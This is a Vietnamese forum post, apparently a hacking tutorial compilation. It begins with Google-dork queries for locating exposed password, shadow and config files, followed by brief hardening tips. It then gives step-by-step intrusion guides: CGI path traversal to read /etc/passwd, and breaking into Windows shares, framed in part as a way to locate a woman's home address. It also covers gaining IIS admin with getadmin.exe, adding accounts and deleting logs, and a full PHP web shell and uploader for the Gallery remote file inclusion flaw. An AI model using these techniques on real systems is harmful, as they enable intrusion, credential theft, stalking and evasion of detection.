chuỗi “link:www.securityfocus.com” sẽ liệt kê những trang web có liên kết trỏ đến trang chủ SecurityFocus.

Chú ý không có khoảng trống giữa "link:" và URL của trang Web.



[ related: ]

Cú pháp “related:” sẽ liệt kê các trang Web "tương tự" với trang Web chỉ định. Ví dụ :

“related:www.securityfocus.com” sẽ liệt kê các trang web tương tự với trang chủ Securityfocus. Nhớ rằng không có khoảng trống giữa "related:" và URL của trang Web.



[ cache: ]

Truy vấn “cache:” sẽ cho kết quả là phiên bản của trang Web mà mà Google đã lưu lại. Ví dụ:

“cache:www.hackingspirits.com” sẽ cho ra trang đã lưu lại bởi Google's. Nhớ rằng không có khoảng trống giữa "cache:" và URL của trang web.

Nếu bạn bao gồm những từ khác trong truy vấn, Google sẽ điểm sáng những từ này trong văn bản đã được lưu lại.

Ví dụ: “cache:www.hackingspirits.com guest” sẽ cho ra văn bản đã được lưu lại có từ "guest" được điểm sáng.



[ intext: ]

Cú pháp “intext:” tìm kiếm các từ trong một website riêng biệt. Nó phớt lờ các liên kết hoặc URL và tiêu đề của trang.

Ví dụ: “intext:exploits” (không có ngoặc kép) sẽ cho kết quả là những liên kết đến những trang web có từ khóa tìm kiếm là "exploits" trong các trang của nó.



[ phonebook: ]

“phonebook” tìm kiếm thông tin về các địa chỉ đường phố ở Mỹ và số điện thoại. Ví dụ:

“phonebookisa+CA” sẽ liệt kê tất cả các tên người có từ “Lisa” trong tên và ở “California (CA)”. Cú pháp này có thể được sử dụng như là một công cụ tuyệt vời của tin tặc trong trường hợp ai đó muốn tìm kiếm thông tin cá nhân cho công việc xã hội.



Truy vấn các site hoặc server dễ bị tấn công sử dụng các cú pháp nâng cao của Google



Những cú pháp truy vấn nâng cao thảo luận ở trên thực sự có thể giúp người ta chính xác hóa các tìm kiếm và có được những gì họ thực sự tìm kiếm.



Bây giờ Google trở thành một máy tìm kiếm thông minh, những người dùng có ác ý không hề bận tâm khai thác khả năng của nó để đào bới những thông tin bí mật từ internet mà chỉ có sự truy cập giới hạn. Bây giờ tôi sẽ thảo luận những kỹ thuật này một cách chi tiết làm thế nào để những người dùng ác tâm đào bới thông tin trên internet sử dụng Google như một công cụ.

Sử dụng cú pháp “Index of ” để tìm kiếm các site cho phép duyệt chỉ mục

Một webserver(máy chủ web) cho phép duyệt chỉ mục nghĩa là bất kỳ ai có thể duyệt các thư mục của webserver như các thư mục nội bộ thông thường. Ở đây tôi sẽ thảo luận làm thế nào để sử dụng cú pháp "index of" để có một danh sách các liên kết đến webserver cho phép duyệt thư mục.

Cách này trở thành một nguồn dễ dàng cho việc thu thập thông tin của tin tặc. Tưởng tưởng nếu họ nắm được các file mật khẩu hoặc các file nhạy cảm khác mà bình thưởng không thể thấy được trên internet.

Dưới đây là vài Ví dụ sử dụng để có được quyền truy cập vào rất nhiều thông tin nhạy cảm dễ dàng hơn rất nhiều:



Index of /admin

Index of /passwd

Index of /password

Index of /mail

"Index of /" +passwd

"Index of /" +password.txt

"Index of /" +.htaccess

"Index of /secret"

"Index of /confidential"

"Index of /root"

"Index of /cgi-bin"

"Index of /credit-card"

"Index of /logs"

"Index of /config"



Tìm kiếm các site hoặc server dễ bị tấn công sử dụng cú pháp “inurl:” hoặc “allinurl:”

a. Sử dụng “allinurl:winnt/system32/” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến server mà cho phép truy cập đến những thư mục giới hạn như “system32” qua web. Nếu bạn đủ may mắn thì bạn có thể có quyền truy cập đến file cmd.exe trong thư mục “system32”. Một khi bạn có quyền truy cập đến file “cmd.exe” và có thể thực thi nó thì bạn có thể tiến lên xa hơn

leo thang quyền của bạn khắp server và làm hại nó.

b. Sử dụng “allinurl:wwwboard/passwd.txt”(không có ngoặc kép) trong

Google search sẽ liệt kê tất cả các liên kết đến server mà dễ bị tấn công vào “tính dễ bị tấn công mật khẩu WWWBoard”. Để biết thêm về tính dễ bị tấn công này bạn có thể vào link sau đây:

http://www.securiteam.com/exploits/2BUQ4S0SAW.html

c. Sử dụng “inurl:.bash_history” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến server mà cho phép truy cập vào file

“.bash_history” qua web. Đây là một file lịch sử dòng lệnh. File này bao gồm danh sách các lệnh được thực thi bởi quản trị viên,

, và đôi khi bao gồm cả thông tin nhạy cảm như mật khẩu

gõ vào bởi quản trị viên. Nếu file này bị làm hại

và nếu nó bao gồm mật khẩu đã mã hóa của hệ thống unix (or *nix)

thì nó có thể dễ dàng bị ##### bởi phương pháp “John The

Ripper”.

d. Sử dụng “inurl:config.txt” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết đến các máy chủ cho phép truy cập vào file “config.txt”

qua giao diện web. File này bao gồm các thông tin nhạy cảm,

bao gồm giá trị bị băm ra của mật khẩu quản trị và sự xác thực quyền truy cập cơ sở dữ liệu. Ví dụ: Hệ thống quản lý học tập Ingenium

là một ứng dụng Web cho các hệ thống Windows phát triển bởi Click2learn, Inc. Hệ thống quản lý học tập Ingenium

phiên bản 5.1 và 6.1 lưu các thông tin nhạy cảm không an tòan trong file config.txt. Để biết thêm thông tin vào liên kết sau:

http://www.securiteam.com/securitynews/6M00H2K5PG.html



Những tìm kiếm tương tự khác dùng “inurl:” hoặc “allinurl:” kết hợp với các cú pháp khác:

inurl:admin filetype:txt

inurl:admin filetype:db

inurl:admin filetype:cfg

inurl:mysql filetype:cfg

inurl[IMG]file:///C:/DOCUME%7E1/ITPRO/LOCALS%7E1/Temp/msohtml1/01/clip_image001.gif[/IMG]asswd filetype:txt

inurl:iisadmin

inurl:auth_user_file.txt

inurl:#####s.txt

inurl:"wwwroot/*."

inurl:adpassword.txt

inurl:webeditor.php

inurl:file_upload.php

inurl:gov filetypels "restricted"

index of ftp +.mdb allinurl:/cgi-bin/ +mailto



Tìm kiếm các site hoặc server dễ bị tấn công dùng “intitle:” hoặc “allintitle:”

a. Sử dụng [allintitle: "index of /root”] (không có ngoặc vuông) sẽ liệt kê các liên kết đến các webserver(máy chủ Web) cho phép truy cập vào các thư mục giới hạn như “root” qua giao diện web. Thư mục này đôi khi bao gồm các thông tin nhạy cảm mà có thể dễ dàng tìm được tqua những yêu cầu Web đơn giản.

b. Sử dụng [allintitle: "index of /admin”] (không có ngoặc vuông) sẽ liệt kê các liên kết đến các website cho phép duyệt chỉ mục các thư mục giới hạn như “admin” qua giao diện web. Hầu hết các ứng dụng web đôi khi sử dụng tên như “admin” để lưu quyền admin trong đó. Thư mục này đôi khi bao hàm các thông tin nhạy cảm mà có thể dễ dàng tìm được qua các yêu cầu Web đơn giản.

Những tìm kiếm tương tự dùng “intitle:” hoặc “allintitle:” kết hợp với các cú pháp khác

intitle:"Index of" .sh_history

intitle:"Index of" .bash_history

intitle:"index of" passwd

intitle:"index of" people.lst

intitle:"index of" pwd.db

intitle:"index of" etc/shadow

intitle:"index of" spwd

intitle:"index of" master.passwd

intitle:"index of" htpasswd

intitle:"index of" members OR accounts

intitle:"index of" user_carts OR user_cart

allintitle: sensitive filetype:doc

allintitle: restricted filetype :mail

allintitle: restricted filetype:doc site:gov



Những truy vấn tìm kiếm thú vị khác

Để tìm những site dễ bị tấn công bằng phương pháp Cross-Sites Scripting (XSS):

allinurl:/scripts/cart32.exe

allinurl:/CuteNews/show_archives.php

allinurl:/phpinfo.php

Để tìm những site dễ bị tấn công bằng phương pháp SQL Injection:

allinurl:/privmsg.php

allinurl:/privmsg.php



Bảo mật các server hoặc site khỏi sự tấn công của Google

Dưới đây là những phương pháp bảo mật mà các quản trị viên và các chuyên gia bảo mật phải đưa vào tài khoản để bảo mật những thông tin then chốt khỏi rơi vào không đúng chỗ:

- Cài những bản vá bảo mật mới nhất cho các ứng dụng cũng như hệ điều hành chạy trên máy chủ.

- Đừng để những thông tin nhạy cảm và then chốt trên máy chủ mà không có hệ thống xác nhận hợp lệ mà có thể bị truy cập trực tiếp bởi bất kỳ ai trên internet.

- Không cho phép duyệt thư mục trên webserver. Duyệt thư mục chỉ nên được cho phép với các thư mục web bạn muốn cho bất kỳ ai trên internet truy cập.

- Nếu bạn tìm thấy bất kỳ liên kết nào đến server hoặc site giới hạn của bạn trong kết quả của Google search thì nó phải được xóa đi. Vào liên kết sau để biết thêm chi tiết:

http://www.google.com/remove.html

- Không cho phép truy cập dấu tên vào webserver qua internet

vào các thư mục hệ thống giới hạn.

- Cài các công cụ lọc như URLScan cho các máy chủ chạy

IIS như là webserver.

Kết luận

Đôi khi tăng sự phức tạp trong hệ thống tạo ra những sự cố mới. Google trở lên phức tạp hơn có thể được sử dụng bởi bất kỳ anh Tom,

anh Dick & Harry nào đó trên internet để đào bới những thông tin nhạy cảm mà thông thường không thể nhìn thấy hoặc với đến bởi bất kỳ ai.

Người ta không thể ngăn cản ai đó ngừng tạo ra những giả mạo vì vậy những lựa chọn duy nhất còn lại cho những chuyên gia bảo mật và quản trị hệ thống là bảo vệ hệ thống của họ và làm khó khăn hơn từ sự xâm hại không mong muốn.



Về tác giả

Không có nhiều điều để tôi có thể nói về chính tôi. Nói một cách ngắn gọn, Tôi dành hầu hết thời gian để nghiên cứu về sự dễ bị tấn công,

một tách càfê và internet. Đó là tất cả về tôi.

Để biết thêm về tôi xin mời vào www.hackingspirits.com

D

ebasis Mohanty

www.hackingspirits.com

Email: [email protected]

Bạn có thể thấy tôi tại:

http://groups.yahoo.com/group/Ring-of-Fire

Nhận xét và góp ý xin gửi cho [email protected].





















24 . ) Cách hack Web cơ bản nhất thông qua CGI script :

_ Lỗi thứ 1 : lỗi nph-test-cgi

+ Đánh tên trang Web bị lỗi vào trong trình duyệt của bạn .
+ Đánh dòng sau vào cuốI cùng : /cgi-bin/nph-test-cgi
+ Lúc đó trên URL bạn sẽ nhìn giống như thế này :

Code:
http://www.servername.com/cgi-bin/nph-test-cg%20i



+ Nếu thành công bạn sẽ thấy các thư mục được cất bên trong . Để xem thư mục nào bạn
đánh tiếp :

CODE
? /*



+ file chứa passwd thường được cất trong thư mục /etc , bạn hãy đánh trên URL dòng sau
:

Code:
http://www.servername.com/cgi-bin/nph-test-cg%20i?/etc/*

_ Lỗi thứ 2 : lỗi php.cgi

+ Tương tự trên bạn chỉ cần đánh trên URL dòng sau để lấy pass :

Code:
http://www.servername.com/cgi-bin/php.cgi?/et c/passwd


Quan trọng là đây là những lỗi đã cũ nên việc tìm các trang Web để các bạn thực hành rất
khó , các bạn hãy vào trang google.com rồi đánh từ khoá :

/cgi-bin/php.cgi?/etc/passwd]
hoặc cgi-bin/nph-test-cgi?/etc

sau đó các bạn hãy tìm trên đó xem thử trang nào chưa fix lỗi để thực hành nhé .


25 . ) Kỹ thuật xâm nhập máy tính đang online :

_ Xâm nhập máy tính đang online là một kỹ thuật vừa dễ lạI vừa khó . Bạn có thể nói dễ khi bạn sử dụng công cụ ENT 3 nhưng bạn sẽ gặp vấn đề khi dùng nó là tốc độ sử dụng trên máy của nạn nhân sẽ bị chậm đi một cách đáng kể và những máy họ không share thì
không thể xâm nhập được, do đó nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp chôm account , có một cách êm thấm hơn , ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân không share là dùng chương trình DOS để tấn công . Ok , ta sẽ bắt đầu :
_ Dùng chương trình scan IP như ENT 3 để scan IP mục tiêu .
_ Vào Start == > Run gõ lệnh cmd .
_ Trong cửa sổ DOS hãy đánh lệnh “net view ”

CODE
+ VD : cnet view 203.162.30.xx


_ Bạn hãy nhìn kết quả , nếu nó có share thì dễ quá , bạn chỉ cần đánh tiếp lệnh net use <ổ đĩa bất kỳ trên máy của bạn > : <ổ share của nạn nhân >
+ VD : cnet use E : 203.162.30.xxC

_ Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd thì bạn hãy download chương trình dò passwd về sử dụng ( theo tôi bạn hãy load chương trình “pqwak2” áp dụng cho việc dò passwd trên máy sử dụng HĐH Win98 hoặc Winme và chương trình
“xIntruder” dùng cho Win NT ) . Chú ý là về cách sử dụng thì hai chương trình tương tự nhau , dòng đầu ta đánh IP của nạn nhân , dòng thứ hai ta đánh tên ổ đĩa share của nạn nhân nhưng đối với “xIntruder” ta chú ý chỉnh Delay của nó cho hợp lý , trong mạng
LAN thì Delay của nó là 100 còn trong mạng Internet là trên dướI 5000 .
_ Nếu máy của nạn nhân không có share thì ta đánh lệnh :

net use <ổ đĩa bất kỳ trên máy của bạn > : c$ (hoặc d$)``administrator``

(còn tiếp)
.......

+ VD : net use E : 203.162.30.xxC$``administrator``

Kiểu chia sẽ bằng c$ là mặc định đối với tất cả các máy USER là ``administrator`` .
_ Chúng ta có thể áp dụng cách này để đột nhập vào máy của cô bạn mà mình “thầm thương trộm nhớ” để tìm những dữ liệu liên quan đến địa chỉ của cô nàng ( với điều kiện
là cô ta đang dùng máy ở nhà và bạn may mắn khi tìm được địa chỉ đó ) . Bạn chỉ cần chat Y!Mass rồi vào DOS đánh lệnh :

cnetstat –n

Khi dùng cách này bạn hãy tắt hết các cửa sổ khác chỉ để khung chat Y!Mass với cô ta thôi , nó sẽ giúp bạn dễ dàng hơn trong việc xác định địa chỉ IP của cô ta . Sau đó bạn
dùng cách xâm nhập mà tôi đã nói ở trên .( Có lẽ anh chàng tykhung của chúng ta hồi xưa khi tán tỉnh cô bạn ở xa qua mạng cũng dùng cách này để đột nhập và tìm hiểu địa chỉ
của cô ta đây mà , hi`hi` . )
Bạn sẽ thành công nếu máy của nạn nhân không cài firewall hay proxy .

================================================== = =

Nhiều bạn có yêu cầu tôi đưa ra địa chỉ chính xác cho các bạn thực tập , nhưng tôi không thể đưa ra được vì rút kinh nghiệm những bài hướng dẫn có địa chỉ chính xác , khi các
bạn thực hành xong đoạt được quyền admin có bạn đã xoá cái database của họ . Như vậy
HVA sẽ mang tiếng là nơi bắt nguồn cho sự phá hoại trên mạng . mong các bạn thông cảm , nếu có thể thì tôi chỉ nêu những cách thức để các bạn tìm những dịa chỉ bị lỗi đó chứ không đưa ra địa chỉ cụ thể nào .

================================================== = =

Ở phần 4 tôi sẽ đề cập đến kỹ thuật chống xâm nhập vào máy tính của mình khi bạn online , tìm hiểu sơ các bước khi ta quyết định hack một trang Web , kỹ thuật tìm ra lỗi trang Web để thực hành , kỹ thuật hack Web thông qua lỗi Gallery.v.v…….


19 . ) Kỹ thuật xâm nhập Window NT từ mạng Internet :

_ Đây là bài học hack đầu tiên mà tôi thực hành khi bắt đầu nghiên cứu về hack , bây giờ
tôi sẽ bày lại cho các bạn . bạn sẽ cần phảI có một số thờI gian để thực hiện được nó vì nó tuy dễ nhưng khó . Ta sẽ bắt đầu :
_ Đầu tiên bạn cần tìm một server chạy IIS :
_ Tiếp đến bạn vào DOS và đánh ` FTP `. VD :

Code:
cFtp http://www.dodgyinc.com/


( trang naỳ khi tôi thực hành thì vẫn còn làm được , bây giờ không biết họ đã fix chưa ,
nếu bạn nào có trang nào khác thì hãy post lên cho mọI ngườI cùng làm nhé ) Nếu connect thành công , bạn sẽ thấy một số dòng tương tự như thế này :

CODE
Connected to http://www.dodgyinc.com./
220 Vdodgy Microsoft FTP Service (Version 3.0). User

Code:
(www.dodgyinc.comnone)):



Cái mà ta thấy ở trên có chứa những thông tin rất quan trọng , nó cho ta biết tên Netbios
của máy tính là “ Vdodgy ” . Từ điều này bạn có thể suy diễn ra tên mà được sử dụng cho
NT để cho phép ta có thể khai thác , mặc định mà dịch vụ FTP gán cho nó nếu nó chưa đổi tên sẽ là “IUSR_VDODGY” . Hãy nhớ lấy vì nó sẽ có ích cho ta . Nhập
``anonymous” trong user nó sẽ xuất hiện dòng sau :

CODE
331 Anonymous access allowed, send identity (e-mail name) as password. Password:



Bây giờ passwd sẽ là bất cứ gì mà ta chưa biết , tuy nhiên , bạn hãy thử đánh vào passwd
là “anonymous” . Nếu nó sai , bạn hãy log in lạI thiết bị FTP , bạn hãy nhớ là khi ta quay
lạI lần này thì không sử dụng cách mạo danh nữa ( anonymous ) mà sử dụng “`Guest” , thử lại passwd với “guest” xem thế nào .
Bây giờ bạn hãy đánh lệnh trong DOS :

CODE Cd /c



Và sẽ nhìn thấy kết quả nếu như bạn đã xâm nhập thành công , bây giờ bạn hãy nhanh chóng tìm thư mục `cgi-bin` . Nếu như bạn may mắn , bạn sẽ tìm được dễ dàng vì thông thường hệ thống quản lý đã đặt `cgi-bin` vào nơi mà ta vừa xâm nhập để cho các ngườI quản lý họ dễ dàng điều khiển mạng hơn . thư mục cgi-bin có thể chứa các chương trình mà bạn có thể lợi dụng nó để chạy từ trình duyệt Web của bạn . Ta hãy bắt đầu “quậy”
nào greenbiggrin.gif greenbiggrin.gif .
_ Đầu tiên , bạn hãy chuyển tớ thư mục cgi-bin và sử dụng lệnh “Binary” ( có thể các bạn không cần dùng lệnh này ) , sau đó bạn dánh tiếp lệnh “put cmd.exe” . Tiếp theo là bạn
cần có file hack để cài vào thư mục này , hãy tìm trên mạng để lấy 2 file quan trọng nhất
đó là `getadmin.exe` và `gasys.dll` . Download chúng xuống , một khi bạn đã có nó hãy cài vào trong thư mục cgi-bin . Ok , coi như mọI việc đã xong , bạn hãy đóng cửa sổ
DOS .
Bây giờ bạn hãy đánh địa chỉ sau lên trình duyệt của bạn :

Code:
http://www.dodgyinc.com/cgi-bin/getadmin.exe? IUSR_VDODGY


Sau vài giây bạn sẽ có được câu trả lời như ở dướI đây :

CODE CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator rights!



Thế là bạn đã mạo danh admin để xâm nhập hệ thống , việc cần thiết bây giờ là bạn hãy
tự tạo cho mình một account , hãy đánh dòng sau trên IE :

Code:
http://www.dodgyinc.com/cgi-
bin/cmd.exe?/c%20cwinnt\system32\net.exe%20user%2
0hacker%20toilahacker%20/add

dòng lệnh trên sẽ tạo cho bạn một account login với user : anhdenday và passwd :
toilahackerBây giờ bạn hãy là cho user này có account của admin , bạn chỉ cần đánh lên
IE lệnh :

Code:
http://www.dodgyinc.com/cgi-bin/getadmin.exe? anhdenday


Vậy là xong rùi đó , bạn hãy disconnect và đến start menu - > find rồi search computer
`www.dodgyinc.com`. Khi tìm thấy , bạn vào explore , explore NT sẽ mở ra bạn hay nhập user và passwd để mở nó ( của tôi là user : anhdenday và passwd : toilahacker ) .

Có một vấn đề là khi bạn xâm nhập hệ thống này thì sẽ bị ghi lại , do đó để xoá dấu vết bạn hãy vào `Winnt\system32\logfiles` mở file log đó rồI xoá những thông tin liên quan đến bạn , rồI save chúng . Nếu bạn muốn lấy một thông báo gì về việc chia sẽ sự xâm
nhập thì bạn hãy thay đổi ngày tháng trên máy tính vớI URL sau :

Code:
http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20 date%2030/04/03


xong rồI bạn hãy xoá file `getadmin.exe`, và `gasys.dll` từ `cgi-bin` . Mục đích khi ta
xâm nhập hệ thống này là “chôm” pass của admin để lần sau xâm nhập một cách hợp lệ ,
do đó bạn hãy tìm file SAM ( chứa pass của admin và member ) trong hệ thống rồI dùng chương trình “l0pht #####” để ##### pass ( Hướng dẫn về cách sử dụng “l0pht ##### v
3.02” tôi đã post lên rồi ,các bạn hãy tự nghiên cứu nhé ) . Đây là link :

Code:
http://vnhacker.org/forum/?act=ST&f=6&t=11566 &s=
Khi ##### xong các bạn đã có user và pass của admin rồI , bây giờ hãy xoá account của
user ( của tôi là “anhdenday” ) đi cho an toàn . Bạn đã có thể làm gì trong hệ thống là tuỳ thích , nhưng các bạn đừng xoá hết tài liệu của họ nhé , tội cho họ lắm .
Bạn cảm thấy thế nào , rắc rối lắm phải không . Lúc tôi thử hack cách này , tôi đã mày mò mất cả 4 giờ , nếu như bạn đã quen thì lần thứ 2 bạn sẽ mất ít thờI gian hơn .

Ở phần 3 tôi sẽ đề cập đến HĐH Linux , đến cách ngắt mật khẩu bảo vệ của một Web site
, và làm thế nào để hack một trang web đơn giản nhất .v.v…

29 . ) Cách tìm các Website bị lỗi :

_ Chắc các bạn biết đến các trang Web chuyên dùng để tìm kiếm thông tin trên mạng chứ
? Nhưng các bạn chắc cũng không ngờ là ta có thể dùng những trang đó để tìm những trang Web bị lỗi ( Tôi vẫn thường dùng trang google.com và khuyên các bạn cũng nên dùng trang này vì nó rất mạnh và hiệu quả ) .
_ Các bạn quan tâm đến lỗi trang Web và muốn tìm chúng bạn chỉ cần vào google.com

và đánh đoạn lỗi đó vào sau “allinurl : ” . VD ta có đoạn mã lỗi trang Web sau :

cgi-bin/php.cgi?/etc/passwd các bạn sẽ đánh :
“allinurl:cgi-bin/php.cgi?/etc/passwd”

Nó sẽ liệt kê ra những trang Web đang bị lỗi này cho các bạn , các bạn hãy nhìn xuống dưới cùng của mỗi mẫu liệt kê ( dòng địa chỉ màu xanh lá cây ) nếu dòng nào viết y
chang từ khoá mình nhập vào thì trang đó đã hoặc đang bị lỗi .Các bạn có xâm nhập vào được hay không thì cũng còn tuỳ vào trang Web đó đã fix lỗi này hay chưa nữa .
_ Các bạn quan tâm đến lỗi forum , các bạn muốn tìm forum dạng này để thực tập , chỉ cần nhập từ khoá

powered by

VD sau là để tìm forum dùng Snitz 2000 :

powered by Snitz 2000

_ Tuy nhiên , việc tìm ra đúng forum hoặc trang Web bị lỗi theo cách đó có xác suất không cao , bạn hãy quan tâm đến đoạn string đặc biệt trong URL đặc trưng cho từng kiểu trang Web hoặc forum đó ( cái này rất quan trọng , các bạn hãy tự mình tìm hiểu thêm nhé ) . VD tìm với lỗi Hosting Controller thì ta sẽ có đoạn đặc trưng sau

``/admin hay /advadmin hay /hosting``

ta hãy đánh từ khoá :

allinurl:/advadmin hoặc allinurl:/admin hoặc allinurl:/hosting

Nó sẽ liệt kê ra các trang Web có URL dạng :

_http://tentrangweb.com/advadmin hoặc _http://tentrangweb.com/admin hoặc _http://tentrangweb.com/hosting

VD với forum UBB có đoạn đặc trưng

``cgi-bin/ultimatebb.cgi?``

Ta cũng tìm tương tự như trên .
Chỉ cần bạn biết cách tìm như vậy rồi thì sau này chỉ cần theo dõi thông tin cập nhật bên

trang “Lỗi bảo mật” của HVA do bạn LeonHart post hằng ngày các bạn sẽ hiểu được ý nghĩa của chúng và tự mình kiểm tra .

30 . ) Kỹ thuật hack Web thông qua lỗi Gallery ( một dạng của lỗi php code inject ):

_ Gallery là một công cụ cho phép tạo một gallery ảnh trên web được viết bằng PHP , lợi dụng sơ hở này ta có thể lợi dụng để viết thêm vào đó một mã PHP cho phép ta upload ,
đó chính là mục đích chính của ta .
_ Trước hết bạn hãy đăng ký một host miễn phí , tốt nhất là bạn đăng ký ở brinkster.com cho dễ . Sau đó bạn mở notepad và tạo file PHP với đoạn mã sau :

CODE
<?php
global $PHP_SELF;
echo ``
<form method=post action=$PHP_SELF?$QUERY_STRING >
<input type=text name=shell size=40 >
<input type=hidden name=act value=shell >
<input type=submit value=Go name=sm >
``; set_magic_quotes_runtime(1); if ($act == ``shell``) {
echo ``\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n < xmp > ``;
system($shell);
echo ``

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n`` ; }
echo `` ``;
? >



Đoạn mã này bạn hãy tạo làm 2 file có tên khác nhau ( nhưng cùng chung một mã ) và đặt tên là :
+ shellphp.php : file này dùng để chạy shell trên victim host .
+ init.php : file này dùng để upload lên trang có host bạn vừa tạo . ( Bạn hãy upload file init.php này lên sớm vì ta sẽ còn sử dụng nó nhưng với đoạn mã khác , bạn quên upload file này lên là tiêu )
Bạn hãy tạo thêm một file PHP với mã sau : CODE
<?php
function handleupload() {
if (is_uploaded_file($_FILES[`userfile`][`tmp_name`])) {
$filename = $_FILES[`userfile`][`tmp_name`];
print ``$filename was uploaded successfuly``;

$realname = $_FILES[`userfile`][`name`];
print ``realname is $realname\n``;
print ``copying file to uploads dir ``.$realname;
copy($_FILES[`userfile`][`tmp_name`],*PATH*.$realna me); // lưu ý *PATH* chúng ta
sẽ thay đổi sau
} else {
echo ``Possible file upload attack: filename``.$_FILES[`userfile`][`name`].``.``;
}
}
if ($act == ``upload``) {
handleupload();
}
echo ``
<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING >
FileINPUT TYPE=FILE NAME=userfile SIZE=35 >
<input type=hidden name=MAX_FILE_SIZE value=1000000 >
<input type=hidden name=act value=upload >
<input type=submit value=Upload name=sm >

``;
? >



Bạn hãy đặt tên là upload.php , nó sẽ dùng để upload lên trang Web của nạn nhân .
_ Tiếp theo Bạn vào Google, gõ ``Powered by gallery`` rồi enter, Google sẽ liệt kê một
đống những site sử dụng Gallery , bạn hãy chọn lấy một trang bất kỳ rồI dùng link sau để thử xem nó còn mắc lỗI Gallery hay không :

http:// trang Web của nạn nhân >
/gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Nếu bạn thấy hiện lên một ô hình chữ nhật ở phía trên cùng , bên phải của nó là ô lệnh chuyển tiếp có chữ “Go” là coi như bạn đã tìm thấy được đốI tượng rồi đó . Bây giờ bạn
đã có thể gõ lệnh thông qua ô chữ nhật đó để hack Web của nạn nhân .
Trước hết bạn hãy gõ lệnh “pwd” để xác định đường dẫn tuyệt đối đến thư mục hiện thời rồi nhấn nút “Go” , khi nó cho kết quả bạn hãy nhanh chóng ghi lại đường dẫn ở phía
dướI ( Tôi sẽ sử dụng VD đường dẫn tôi tìm thấy là “/home/abc/xyz/gallery” ).
Sau đó bạn đánh tiếp lệnh “|s –a|” để liệt kê các thư mục con của nó . Bây giờ bạn hãy
nhìn kết quả , bạn sẽ thấy một đống các thư mục con mà ta đã liệt kê . Bạn hãy luôn nhớ
là mục đích của chúng ta là tìm một thư mục có thể dùng để upload file upload.php mà ta
đã chuẩn bị từ trước do đó bạn hãy xác định cùng tôi bằng cách nhìn vào những chữ cuốI
cùng của mỗi hàng kết quả :
+ Bạn hãy loại bỏ trường hợp các thư mục mà có dấu “.” hoặc “..” vì đây là thư mục gốc hoặc là thư mục ảo ( Nó thường được xếp trên cùng của các hàng kết quả ) .
+ Bạn cũng loạI bỏ những hàng có chữ cuối cùng có gắn đuôi ( VD như config.php ,

check.inc .v.v… ) vì đây là những file chứ không phải là thư mục .
+ Còn lại là những thư mục có thể upload nhưng tôi khuyên bạn nên chọn những hàng chứa tên thư mục mà có chứa số lớn hơn 1 ( Bạn có thể xác định được chúng bằng cách nhìn cột thứ 2 từ trái sang ) , vì như vậy vừa chắc chắn đây là thư mục không phải thư
mục ảo , vừa làm cho admin của trang Web đó khó phát hiện khi ta cài file của ta vào .
Tôi VD tôi phát hiện ra thư mục “loveyou” có chứa 12 file có thể cho ta upload , như vậy đường dẫn chính thức mà ta upload lên sẽ là :

/home/abc/xyz/Gallery/loveyou

Bây giờ bạn hãy vào account host của bạn, sửa nội dung file init.php giống như mã của file upload.php, nhưng sửa lại *PATH* thành “/home/abc/xyz/gallery/loveyou/ ”. Đồng
thời cũng chuẩn bị một file upload.php trên máy của bạn với *PATH* là “” ( 2 dấu ngoặc kép ).
Bây giờ là ta đã có thể upload file upload.php lên trang Web của nạn nhân được rồi , bạn hãy nhập địa chỉ sau trên trình duyệt Web của bạn :

http:// trang Web của nạn nhân >
/gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Bạn sẽ thấy xuất hiện tiếp một khung hình chữ nhật và bên cạnh là có 2 nút lệnh , một là nút “brown” , một là nút “upload” . Nút “brown” bạn dùng để dẫn đến địa chỉ file upload.php bạn đã chuẩn bị trên máy của bạn , nút “upload” khi bạn nhấn vào đó thì nó
sẽ upload file upload.php lên trang Web của nạn nhân . Ok , bây giờ coi như bạn đã hoàn thành chặng đường hack Web rồi đó . Từ bây giờ bạn hãy vận dụng để tấn công đối thủ
như lấy database , password ( làm tương tự như các bài hướng dẫn hack trước ) , nhưng các bạn chỉ nên thực tập chứ đừng xoá database hay phá Web của họ. Nếu là một hacker chân chính các bạn chỉ cần upload lên trang Web dòng chữ : “Hack by ……..” là đủ rồi . Cũng như những lần trước , các bạn có thành công hay không cũng tuỳ thuộc vào sự may
mắn và kiên trì nghiên cứu vận dụng kiến thức của các bạn .

__________________


Ấn Thank thể hiện đẳng cấp



To view links or images in signatures your post count must be 0 or greater. You currently have 0 posts.
Zµ™ đang ẩn   Trả lời với trích dẫn
The Following 3 Users Say Thank You to Zµ™ For This Useful Post:
-l- Thiếu Gia Đi Cày -l- (20-08-2011), Larva (02-08-2012)
 

Đánh dấu

Công cụ bài viết
Kiểu hiển thị

Quyền viết bài
Bạn không thể gửi chủ đề mới
Bạn không thể gửi trả lời
Bạn không thể gửi file đính kèm
Bạn không thể sửa bài viết của mình

BB code đang Mở
Mặt cười đang Mở
[IMG] đang Mở
HTML đang Tắt

Chuyển đến

Múi giờ GMT +8. Hiện tại là 09:50 PM

giới trẻ | girl xinh | Ngắm|Nonstop|Nhac Nonstop|Nghe Nhac | Maria Ozawa|M88
Truy cập vào Website, nghĩa là bạn đã chấp nhận Quy Định của Forum!
BQT sẽ không chịu trách nhiệm về nội dung đăng tải do người dùng đưa lên.
Powered By: vBulletin 1.0 & Copyright © 2009 - 2012, Jelsoft Enterprises Ltd.
Xem tốt nhất ở độ phân giải 1024x768 trên trình duyệt Firefox và Chrome
Phát triển bởi Các Thành Viên CongDongvip.Com